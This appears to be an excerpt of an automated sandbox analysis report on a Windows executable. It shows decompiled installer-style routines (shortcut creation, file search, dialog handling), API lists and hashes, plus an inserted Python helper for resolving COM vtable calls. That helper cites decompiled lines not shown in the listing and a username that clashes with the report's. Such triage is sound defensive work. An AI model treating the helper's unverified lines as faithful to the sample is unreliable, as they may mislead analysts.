                                        					_t50 =  *((intOrPtr*)(_t100 + 8));
                                        					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                        					if(_t95 >= _t75) {
                                        						_push(0xfffffff4);
                                        					} else {
                                        						goto L12;
                                        					}
                                        				}
                                        				E00401428();
                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t100 - 4));
                                        				return 0;
                                        			}

Addresses (one per line of the C code above, in listing order): 0x004020af 0x004020b9 0x004020c2 0x004020cc 0x004020d5 0x004020df 0x004020e3 0x004020e3 0x004020e8 0x004020f9 0x00402101 0x004021df 0x004021df 0x004021e6 0x00402107 0x00402107 0x00402118 0x0040211c 0x00402122 0x0040212c 0x0040212e 0x00402139 0x0040213c 0x00402149 0x0040214b 0x0040214d 0x00402154 0x00402157 0x00402157 0x0040215a 0x00402164 0x0040216c 0x00402171 0x0040217d 0x0040217d 0x00402180 0x00402189 0x0040218c 0x00402195 0x0040219a 0x004021ac 0x004021b5 0x004021bb 0x004021c7 0x004021c7 0x004021c9 0x004021cf 0x004021cf 0x004021d2 0x004021d8 0x004021dd 0x004021f2 0x00000000 0x00000000 0x00000000 0x004021dd 0x004021e8 0x00402932 0x0040293e

                                        APIs
                                        • CoCreateInstance.OLE32(00407324,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020F9
                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409418,00000400,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021B5
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00402131
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID: C:\Users\user\AppData\Local\Temp
                                        • API String ID: 123533781-47812868
                                        • Opcode ID: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
                                        • Instruction ID: 6da020dad1963d07c1d5d6cba7c730fbb78a3e39a4a6f028781d9f3b25516250
                                        • Opcode Fuzzy Hash: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
                                        • Instruction Fuzzy Hash: 0D417D75A00215BFCB00DFA8CD88E9E7BB6FF89315B20416AF905EB2D1CA759D41CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%
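Reading the indirect calls in the first decompiled function above by hand is slow: the decompiler only shows them as `*( *obj + 0xNN)(obj, ...)` vtable slots. The Python below is an analyst aid added to this page; it is not part of the Joe Sandbox report and not code from the sample. It parses the decompiled lines (copied from the listing above), tracks which frame slot each object pointer was loaded from, and resolves every slot offset against the x86 vtable layouts of IShellLinkA and IPersistFile. Two assumptions are built in and are not stated on the page: that `_t100 + 8` (the routine's first argument) holds the IShellLinkA pointer produced by the CoCreateInstance call listed under APIs, and that `_t100 - 8` is the local filled by the leading QueryInterface call with an IPersistFile pointer. Under those assumptions the call sequence resolves to SetPath, SetWorkingDirectory, SetShowCmd, SetHotkey, SetIconLocation, SetArguments, SetDescription and IPersistFile::Save, i.e. the routine writes a .lnk shortcut whose working directory is the Temp path shown under Strings, and the MultiByteToWideChar call just widens the target filename for Save.

```python
import re
from typing import Dict, List, Tuple

# x86 vtable layouts, one 4-byte slot per method. IUnknown always occupies
# slots 0-2; IPersistFile inherits IPersist (GetClassID) before its own methods.
IUNKNOWN = ["QueryInterface", "AddRef", "Release"]
ISHELLLINKA = IUNKNOWN + [
    "GetPath", "GetIDList", "SetIDList", "GetDescription", "SetDescription",
    "GetWorkingDirectory", "SetWorkingDirectory", "GetArguments", "SetArguments",
    "GetHotkey", "SetHotkey", "GetShowCmd", "SetShowCmd", "GetIconLocation",
    "SetIconLocation", "SetRelativePath", "Resolve", "SetPath",
]
IPERSISTFILE = IUNKNOWN + ["GetClassID", "IsDirty", "Load", "Save", "SaveCompleted", "GetCurFile"]
LAYOUTS = {"IShellLinkA": ISHELLLINKA, "IPersistFile": IPERSISTFILE, "IUnknown": IUNKNOWN}

# Assumption (not stated in the report): _t100 is the frame pointer, [_t100+8]
# is the first argument (the IShellLinkA* from CoCreateInstance) and [_t100-8]
# is the local that QueryInterface fills with the IPersistFile*.
FRAME_SLOT_INTERFACE = {("+", 0x8): "IShellLinkA", ("-", 0x8): "IPersistFile"}

# Object loads and indirect calls copied from the decompiled listing above;
# the parser ignores arithmetic, branches and direct API calls.
DECOMPILED_SNIPPET = r"""
_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407334, _t100 - 8);
_t52 =  *((intOrPtr*)(_t100 + 8));
_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
_t54 =  *((intOrPtr*)(_t100 + 8));
 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
_t88 =  *((intOrPtr*)(_t100 + 8));
 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
_t59 =  *((intOrPtr*)(_t100 + 8));
 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
_t71 =  *((intOrPtr*)(_t100 + 8));
 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x34)),  *(_t100 - 0x14) & 0x000000ff);
_t62 =  *((intOrPtr*)(_t100 + 8));
 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
_t64 =  *((intOrPtr*)(_t100 + 8));
 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409418, 0x400);
_t69 =  *((intOrPtr*)(_t100 - 8));
_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409418, 1);
_t66 =  *((intOrPtr*)(_t100 - 8));
 *((intOrPtr*)( *_t66 + 8))(_t66);
_t50 =  *((intOrPtr*)(_t100 + 8));
 *((intOrPtr*)( *_t50 + 8))(_t50);
"""

# "_tNN =  *((intOrPtr*)(_t100 + 8));"  -> temp NN loaded from a frame slot
ASSIGN_RE = re.compile(r"^(_t\d+)\s*=\s*\*\(\(intOrPtr\*\)\((_t\d+)\s*([+-])\s*(0x[0-9a-fA-F]+|\d+)\)\);$")
# "*((intOrPtr*)( *_tNN + 0x50))(args);" -> call through slot 0x50 of NN's vtable
VCALL_RE = re.compile(r"\*\(\(intOrPtr\*\)\(\s*\*(_t\d+)(?:\s*\+\s*(0x[0-9a-fA-F]+|\d+))?\)\)\((.*)\);")


def annotate_vtable_calls(src: str) -> List[Tuple[str, str, str]]:
    """Resolve each indirect vtable call in decompiled text to (interface, method, args)."""
    objects: Dict[str, str] = {}              # temp variable -> interface it points to
    calls: List[Tuple[str, str, str]] = []
    for raw in src.splitlines():
        line = raw.strip()
        m = ASSIGN_RE.match(line)
        if m:
            var, base, sign, disp = m.groups()
            iface = FRAME_SLOT_INTERFACE.get((sign, int(disp, 0)))
            if base == "_t100" and iface:
                objects[var] = iface
            continue
        m = VCALL_RE.search(line)
        if not m:
            continue
        var, off, args = m.groups()
        slot = int(off, 0) // 4 if off else 0
        iface = objects.get(var, "IUnknown")  # unknown object: only IUnknown slots are safe to name
        layout = LAYOUTS[iface]
        method = layout[slot] if slot < len(layout) else f"slot{slot}"
        calls.append((iface, method, args.strip()))
    return calls


def call_sequence(src: str) -> List[str]:
    """'Interface::Method' names in program order."""
    return [f"{iface}::{method}" for iface, method, _ in annotate_vtable_calls(src)]


def string_arguments(src: str) -> Dict[str, str]:
    """Method name -> first quoted C string literal passed to it (e.g. the working directory)."""
    out: Dict[str, str] = {}
    for _, method, args in annotate_vtable_calls(src):
        m = re.search(r'"((?:[^"\\]|\\.)*)"', args)
        if m:
            out[method] = m.group(1)
    return out


def writes_shortcut(src: str) -> bool:
    """True when the routine both sets a link target and persists it through IPersistFile::Save."""
    seq = call_sequence(src)
    return "IShellLinkA::SetPath" in seq and "IPersistFile::Save" in seq


if __name__ == "__main__":
    for iface, method, args in annotate_vtable_calls(DECOMPILED_SNIPPET):
        print(f"{iface}::{method}({args})")
    print("writes .lnk:", writes_shortcut(DECOMPILED_SNIPPET))
```

The same parser can be pointed at other functions in this report as long as the frame-slot table is adjusted for the interface pointers each one handles; a slot that is not in the table falls back to the IUnknown layout, so AddRef/Release stay identifiable even for objects whose type is unknown.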

                                        C-Code - Quality: 39%
                                        			E004026BC(char __ebx, CHAR* __edi, char* __esi) {
                                        				void* _t19;
                                        
                                        				if(FindFirstFileA(E00402A9A(2), _t19 - 0x1a4) != 0xffffffff) {
                                        					E0040591D(__edi, _t6);
                                        					_push(_t19 - 0x178);
                                        					_push(__esi);
                                        					E004059BF();
                                        				} else {
                                        					 *((char*)(__edi)) = __ebx;
                                        					 *__esi = __ebx;
                                        					 *((intOrPtr*)(_t19 - 4)) = 1;
                                        				}
                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t19 - 4));
                                        				return 0;
                                        			}

Addresses (one per line of the C code above, in listing order): 0x004026d4 0x004026e8 0x004026f3 0x004026f4 0x00402855 0x004026d6 0x004026d6 0x004026d8 0x004026da 0x004026da 0x00402932 0x0040293e

                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026CB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: FileFindFirst
                                        • String ID:
                                        • API String ID: 1974802433-0
                                        • Opcode ID: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
                                        • Instruction ID: fa0b3d5524a7ec5f3b356c4eb27d29c110ff1bfb4a1b37a6377ddf9626cce4e3
                                        • Opcode Fuzzy Hash: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
                                        • Instruction Fuzzy Hash: EBF0A0B2608110DBE701EBA49E49AEEB768DF52324F60417BE141B20C1D6B84A44DA2A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.660079637.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                        • Instruction ID: f210945fa1ab53eb5d6914941c42772a2d787359eee64c7f4631c3f57ad89e1e
                                        • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                        • Instruction Fuzzy Hash: 80014D78A10208EFCB80DF98C584D9DBBF4FB08220F108595E858E7721E730AE50DB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.660079637.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                        • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                        • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                        • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 77%
                                        			E004038BF(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                        				void* _v84;
                                        				void* _v88;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t33;
                                        				signed int _t35;
                                        				struct HWND__* _t37;
                                        				struct HWND__* _t47;
                                        				struct HWND__* _t65;
                                        				struct HWND__* _t71;
                                        				struct HWND__* _t84;
                                        				struct HWND__* _t89;
                                        				struct HWND__* _t97;
                                        				int _t101;
                                        				int _t104;
                                        				struct HWND__* _t117;
                                        				struct HWND__* _t120;
                                        				signed int _t122;
                                        				struct HWND__* _t127;
                                        				long _t132;
                                        				int _t134;
                                        				int _t135;
                                        				struct HWND__* _t136;
                                        				void* _t139;
                                        
                                        				_t135 = _a8;
                                        				if(_t135 == 0x110 || _t135 == 0x408) {
                                        					_t33 = _a12;
                                        					_t117 = _a4;
                                        					__eflags = _t135 - 0x110;
                                        					 *0x79f56c = _t33;
                                        					if(_t135 == 0x110) {
                                        						 *0x7a2f84 = _t117;
                                        						 *0x79f57c = GetDlgItem(_t117, 1);
                                        						_t89 = GetDlgItem(_t117, 2);
                                        						_push(0xffffffff);
                                        						_push(0x1c);
                                        						 *0x79e548 = _t89;
                                        						E00403DA7(_t117);
                                        						SetClassLongA(_t117, 0xfffffff2,  *0x7a2768);
                                        						 *0x7a274c = E00401410(4);
                                        						_t33 = 1;
                                        						__eflags = 1;
                                        						 *0x79f56c = 1;
                                        					}
                                        					_t120 =  *0x409284; // 0xffffffff
                                        					_t132 = (_t120 << 6) +  *0x7a2fa0;
                                        					__eflags = _t120;
                                        					if(_t120 < 0) {
                                        						L38:
                                        						E00403DF3(0x40b);
                                        						while(1) {
                                        							_t35 =  *0x79f56c;
                                        							 *0x409284 =  *0x409284 + _t35;
                                        							_t132 = _t132 + (_t35 << 6);
                                        							_t37 =  *0x409284; // 0xffffffff
                                        							__eflags = _t37 -  *0x7a2fa4;
                                        							if(_t37 ==  *0x7a2fa4) {
                                        								E00401410(1);
                                        							}
                                        							__eflags =  *0x7a274c;
                                        							if( *0x7a274c != 0) {
                                        								break;
                                        							}
                                        							__eflags =  *0x409284 -  *0x7a2fa4; // 0xffffffff
                                        							if(__eflags >= 0) {
                                        								break;
                                        							}
                                        							_push( *((intOrPtr*)(_t132 + 0x24)));
                                        							_t122 =  *(_t132 + 0x14);
                                        							_push(0x7ab000);
                                        							E004059E1(_t117, _t122, _t132);
                                        							_push( *((intOrPtr*)(_t132 + 0x20)));
                                        							_push(0xfffffc19);
                                        							E00403DA7(_t117);
                                        							_push( *((intOrPtr*)(_t132 + 0x1c)));
                                        							_push(0xfffffc1b);
                                        							E00403DA7(_t117);
                                        							_push( *((intOrPtr*)(_t132 + 0x28)));
                                        							_push(0xfffffc1a);
                                        							E00403DA7(_t117);
                                        							_t47 = GetDlgItem(_t117, 3);
                                        							__eflags =  *0x7a300c;
                                        							_t136 = _t47;
                                        							if( *0x7a300c != 0) {
                                        								_t122 = _t122 & 0x0000fefd | 0x00000004;
                                        								__eflags = _t122;
                                        							}
                                        							ShowWindow(_t136, _t122 & 0x00000008);
                                        							EnableWindow(_t136, _t122 & 0x00000100);
                                        							E00403DC9(_t122 & 0x00000002);
                                        							EnableWindow( *0x79e548, _t122 & 0x00000004);
                                        							SendMessageA(_t136, 0xf4, 0, 1);
                                        							__eflags =  *0x7a300c;
                                        							if( *0x7a300c == 0) {
                                        								_push( *0x79f57c);
                                        							} else {
                                        								SendMessageA(_t117, 0x401, 2, 0);
                                        								_push( *0x79e548);
                                        							}
                                        							E00403DDC();
                                        							E004059BF(0x79f580, 0x7a2780);
                                        							_push( *((intOrPtr*)(_t132 + 0x18)));
                                        							_push( &(0x79f580[lstrlenA(0x79f580)]));
                                        							E004059E1(_t117, 0, _t132);
                                        							SetWindowTextA(_t117, 0x79f580);
                                        							_push(0);
                                        							_t65 = E0040136D( *((intOrPtr*)(_t132 + 8)));
                                        							__eflags = _t65;
                                        							if(_t65 != 0) {
                                        								continue;
                                        							} else {
                                        								__eflags =  *_t132 - _t65;
                                        								if( *_t132 == _t65) {
                                        									continue;
                                        								}
                                        								__eflags =  *(_t132 + 4) - 5;
                                        								if( *(_t132 + 4) != 5) {
                                        									DestroyWindow( *0x7a2758);
                                        									 *0x79ed58 = _t132;
                                        									__eflags =  *_t132;
                                        									if( *_t132 > 0) {
                                        										_t71 = CreateDialogParamA( *0x7a2f80,  *_t132 +  *0x7a2760 & 0x0000ffff, _t117,  *(0x409288 +  *(_t132 + 4) * 4), _t132);
                                        										__eflags = _t71;
                                        										 *0x7a2758 = _t71;
                                        										if(_t71 != 0) {
                                        											_push( *((intOrPtr*)(_t132 + 0x2c)));
                                        											_push(6);
                                        											E00403DA7(_t71);
                                        											GetWindowRect(GetDlgItem(_t117, 0x3fa), _t139 + 0x10);
                                        											ScreenToClient(_t117, _t139 + 0x10);
                                        											SetWindowPos( *0x7a2758, 0,  *(_t139 + 0x20),  *(_t139 + 0x20), 0, 0, 0x15);
                                        											_push(0);
                                        											E0040136D( *((intOrPtr*)(_t132 + 0xc)));
                                        											ShowWindow( *0x7a2758, 8);
                                        											E00403DF3(0x405);
                                        										}
                                        									}
                                        									goto L58;
                                        								}
                                        								__eflags =  *0x7a300c - _t65;
                                        								if( *0x7a300c != _t65) {
                                        									goto L61;
                                        								}
                                        								__eflags =  *0x7a3000 - _t65;
                                        								if( *0x7a3000 != _t65) {
                                        									continue;
                                        								}
                                        								goto L61;
                                        							}
                                        						}
                                        						DestroyWindow( *0x7a2758);
                                        						 *0x7a2f84 =  *0x7a2f84 & 0x00000000;
                                        						__eflags =  *0x7a2f84;
                                        						EndDialog(_t117,  *0x79e950);
                                        						goto L58;
                                        					} else {
                                        						__eflags = _t33 - 1;
                                        						if(_t33 != 1) {
                                        							L37:
                                        							__eflags =  *_t132;
                                        							if( *_t132 == 0) {
                                        								goto L61;
                                        							}
                                        							goto L38;
                                        						}
                                        						_push(0);
                                        						_t84 = E0040136D( *((intOrPtr*)(_t132 + 0x10)));
                                        						__eflags = _t84;
                                        						if(_t84 == 0) {
                                        							goto L37;
                                        						}
                                        						SendMessageA( *0x7a2758, 0x40f, 0, 1);
                                        						__eflags =  *0x7a274c;
                                        						return 0 |  *0x7a274c == 0x00000000;
                                        					}
                                        				} else {
                                        					_t117 = _a4;
                                        					if(_t135 == 0x47) {
                                        						SetWindowPos( *0x79f560, _t117, 0, 0, 0, 0, 0x13);
                                        					}
                                        					if(_t135 == 5) {
                                        						asm("sbb eax, eax");
                                        						ShowWindow( *0x79f560,  ~(_a12 - 1) & _t135);
                                        					}
                                        					if(_t135 != 0x40d) {
                                        						__eflags = _t135 - 0x11;
                                        						if(_t135 != 0x11) {
                                        							__eflags = _t135 - 0x10;
                                        							if(_t135 != 0x10) {
                                        								L14:
                                        								__eflags = _t135 - 0x111;
                                        								if(_t135 != 0x111) {
                                        									L30:
                                        									return E00403E0E(_t135, _a12, _a16);
                                        								}
                                        								_t134 = _a12 & 0x0000ffff;
                                        								_t127 = GetDlgItem(_t117, _t134);
                                        								__eflags = _t127;
                                        								if(_t127 == 0) {
                                        									L17:
                                        									__eflags = _t134 - 1;
                                        									if(_t134 != 1) {
                                        										__eflags = _t134 - 3;
                                        										if(_t134 != 3) {
                                        											__eflags = _t134 - 2;
                                        											if(_t134 != 2) {
                                        												L29:
                                        												SendMessageA( *0x7a2758, 0x111, _a12, _a16);
                                        												goto L30;
                                        											}
                                        											__eflags =  *0x7a300c;
                                        											if( *0x7a300c == 0) {
                                        												_t97 = E00401410(3);
                                        												__eflags = _t97;
                                        												if(_t97 != 0) {
                                        													goto L30;
                                        												}
                                        												 *0x79e950 = 1;
                                        												L25:
                                        												_push(0x78);
                                        												L26:
                                        												E00403D80();
                                        												goto L30;
                                        											}
                                        											E00401410(_t134);
                                        											 *0x79e950 = _t134;
                                        											goto L25;
                                        										}
                                        										__eflags =  *0x409284;
                                        										if( *0x409284 <= 0) {
                                        											goto L29;
                                        										}
                                        										_push(0xffffffff);
                                        										goto L26;
                                        									}
                                        									_push(1);
                                        									goto L26;
                                        								}
                                        								SendMessageA(_t127, 0xf3, 0, 0);
                                        								_t101 = IsWindowEnabled(_t127);
                                        								__eflags = _t101;
                                        								if(_t101 == 0) {
                                        									goto L61;
                                        								}
                                        								goto L17;
                                        							}
                                        							__eflags =  *0x409284 -  *0x7a2fa4 - 1; // 0xffffffff
                                        							if(__eflags != 0) {
                                        								goto L30;
                                        							}
                                        							_t104 = IsWindowEnabled( *0x79e548);
                                        							__eflags = _t104;
                                        							if(_t104 != 0) {
                                        								goto L30;
                                        							}
                                        							_t135 = 0x111;
                                        							_a12 = 1;
                                        							goto L14;
                                        						}
                                        						SetWindowLongA(_t117, 0, 0);
                                        						return 1;
                                        					} else {
                                        						DestroyWindow( *0x7a2758);
                                        						 *0x7a2758 = _a12;
                                        						L58:
                                        						if( *0x7a0580 == 0 &&  *0x7a2758 != 0) {
                                        							ShowWindow(_t117, 0xa);
                                        							 *0x7a0580 = 1;
                                        						}
                                        						L61:
                                        						return 0;
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038FB
                                        • ShowWindow.USER32(?), ref: 00403918
                                        • DestroyWindow.USER32 ref: 0040392C
                                        • SetWindowLongA.USER32 ref: 0040394A
                                        • IsWindowEnabled.USER32 ref: 00403975
                                        • GetDlgItem.USER32 ref: 004039A3
                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004039BF
                                        • IsWindowEnabled.USER32(00000000), ref: 004039C2
                                        • GetDlgItem.USER32 ref: 00403A6A
                                        • GetDlgItem.USER32 ref: 00403A74
                                        • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403A8E
                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403ADF
                                        • GetDlgItem.USER32 ref: 00403B86
                                        • ShowWindow.USER32(00000000,?), ref: 00403BA6
                                        • EnableWindow.USER32(00000000,?), ref: 00403BB5
                                        • EnableWindow.USER32(?,?), ref: 00403BD0
                                        • SendMessageA.USER32(00000000,000000F4,00000000,00000001), ref: 00403BE7
                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BFA
                                        • lstrlenA.KERNEL32(0079F580,?,0079F580,007A2780), ref: 00403C23
                                        • SetWindowTextA.USER32(?,0079F580), ref: 00403C32
                                        • ShowWindow.USER32(?,0000000A), ref: 00403D64
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Window$ItemMessageSend$Show$EnableEnabledLong$ClassDestroyTextlstrlen
                                        • String ID:
                                        • API String ID: 3950083612-0
                                        • Opcode ID: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
                                        • Instruction ID: 5dd3c4f218cf3e404d6a97a2e5ce8d1cdd0b8388a563f9de6f37f2f8e87629b5
                                        • Opcode Fuzzy Hash: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
                                        • Instruction Fuzzy Hash: 9DC1CC70904200AFD720AF25ED45E277FADEB89706F00453AF641B52F2D67DAA42CB1D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 92%
                                        			E00403EEF(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                        				char* _v8;
                                        				signed int _v12;
                                        				void* _v16;
                                        				struct HWND__* _t52;
                                        				long _t86;
                                        				int _t98;
                                        				struct HWND__* _t99;
                                        				signed int _t100;
                                        				intOrPtr _t109;
                                        				int _t110;
                                        				signed int* _t112;
                                        				signed int _t113;
                                        				char* _t114;
                                        				CHAR* _t115;
                                        
                                        				if(_a8 != 0x110) {
                                        					if(_a8 != 0x111) {
                                        						L11:
                                        						if(_a8 != 0x4e) {
                                        							if(_a8 == 0x40b) {
                                        								 *0x79f568 =  *0x79f568 + 1;
                                        							}
                                        							L25:
                                        							_t110 = _a16;
                                        							L26:
                                        							return E00403E0E(_a8, _a12, _t110);
                                        						}
                                        						_t52 = GetDlgItem(_a4, 0x3e8);
                                        						_t110 = _a16;
                                        						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                        							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                        							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                        							_v12 = _t100;
                                        							_v16 = _t109;
                                        							_v8 = 0x7a1f20;
                                        							if(_t100 - _t109 < 0x800) {
                                        								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                        								SetCursor(LoadCursorA(0, 0x7f02));
                                        								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
                                        								SetCursor(LoadCursorA(0, 0x7f00));
                                        								_t110 = _a16;
                                        							}
                                        						}
                                        						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                        							goto L26;
                                        						} else {
                                        							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                        								SendMessageA( *0x7a2f84, 0x111, 1, 0);
                                        							}
                                        							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                        								SendMessageA( *0x7a2f84, 0x10, 0, 0);
                                        							}
                                        							return 1;
                                        						}
                                        					}
                                        					if(_a12 >> 0x10 != 0 ||  *0x79f568 != 0) {
                                        						goto L25;
                                        					} else {
                                        						_t112 =  *0x79ed58 + 0x14;
                                        						if(( *_t112 & 0x00000020) == 0) {
                                        							goto L25;
                                        						}
                                        						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                        						E00403DC9(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                        						E0040417A();
                                        						goto L11;
                                        					}
                                        				}
                                        				_t98 = _a16;
                                        				_t113 =  *(_t98 + 0x30);
                                        				if(_t113 < 0) {
                                        					_t113 =  *( *0x7a275c - 4 + _t113 * 4);
                                        				}
                                        				_push( *((intOrPtr*)(_t98 + 0x34)));
                                        				_t114 = _t113 +  *0x7a2fb8;
                                        				_push(0x22);
                                        				_a16 =  *_t114;
                                        				_v12 = _v12 & 0x00000000;
                                        				_t115 = _t114 + 1;
                                        				_v16 = _t115;
                                        				_v8 = E00403EBB;
                                        				E00403DA7(_a4);
                                        				_push( *((intOrPtr*)(_t98 + 0x38)));
                                        				_push(0x23);
                                        				E00403DA7(_a4);
                                        				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                        				E00403DC9( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                        				_t99 = GetDlgItem(_a4, 0x3e8);
                                        				E00403DDC(_t99);
                                        				SendMessageA(_t99, 0x45b, 1, 0);
                                        				_t86 =  *( *0x7a2f88 + 0x68);
                                        				if(_t86 < 0) {
                                        					_t86 = GetSysColor( ~_t86);
                                        				}
                                        				SendMessageA(_t99, 0x443, 0, _t86);
                                        				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                        				 *0x79e54c =  *0x79e54c & 0x00000000;
                                        				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                        				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                        				 *0x79f568 =  *0x79f568 & 0x00000000;
                                        				return 0;
                                        			}

